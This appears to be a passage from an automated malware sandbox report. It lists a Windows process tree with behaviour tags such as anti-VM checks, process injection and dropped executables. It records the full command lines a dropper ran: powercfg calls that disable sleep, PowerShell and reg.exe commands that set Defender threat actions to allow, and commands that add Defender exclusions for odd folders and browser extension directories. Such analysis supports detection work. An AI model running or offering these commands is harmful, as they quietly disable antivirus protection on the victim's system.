  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4176
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2740

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3832

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3048

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3104
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1088
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1548
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:4260
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4564
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1828
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:4600

C:\Users\Admin\AppData\Local\Temp\7zSD58B.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSD58B.tmp\Install.exe Ij /Vgbedido 525403 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3824
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5548
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4480
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:3952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5416
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5380
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5788
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5140
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3284
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5324
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5328
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5304
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5496
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1208
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ANKVsfPAuVEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ANKVsfPAuVEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nXmjFVOHU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nXmjFVOHU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tuyZfYaPCcjxC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tuyZfYaPCcjxC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\utOkvPMviNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\utOkvPMviNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hVWjTjnIaijqmUVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hVWjTjnIaijqmUVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bpNowFaEeWbSfYmu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bpNowFaEeWbSfYmu\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2776
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4056
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5968
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5580
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5528
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hVWjTjnIaijqmUVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5080
